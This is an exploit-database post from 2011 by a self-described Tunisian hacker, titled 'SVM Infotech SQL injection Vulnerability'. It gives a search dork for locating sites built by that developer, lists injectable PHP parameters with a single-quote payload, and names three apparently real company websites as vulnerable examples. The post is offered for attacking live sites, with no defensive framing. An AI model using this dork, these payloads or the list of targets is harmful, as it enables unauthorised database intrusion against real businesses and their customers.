SVM Infotech.. SQL injection Vulnerability

EKU-ID: 540	CVE:	OSVDB-ID:
Author: k's0uR!	Published: 2011-06-16	Verified:
Download:

Rating

☆☆☆☆☆

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+] Exploit Title : SVM Infotech.. SQL injection Vulnerability
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "Developed & Managed By: SVM Infotech"[Or]"Designed & Developed By: SVM Infotech"
[+] Tested on : Windows Xp SP2

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+] Exploit:

››http://localhost/products.php?id={VaLid id }
››http://localhost/project_detail.php?a={VaLid id }
››http://localhost/products.php?p_id={VaLid id }

››Check all .php?*= mostly all vul.. to sql-i.!
›› use your head..!!

››http://localhost/products.php?id=1' » {sql Error} (^_^)
››http://localhost/products.php?id= SQL here
...

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+] Example:

››http://www.suryalabexpotech.com/products.php?id=9'
››http://ashramexim.com/products.php?p_id=2'
››http://visionnvalue.com/project_detail.php?a=Amrapali Golf Homes'

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]Greetz To : 4ll 1nj3ctor team... 4ll My friendS ...tunis1an h4ck3rs...++...
[+] Made in tunisia
[+]to be continued..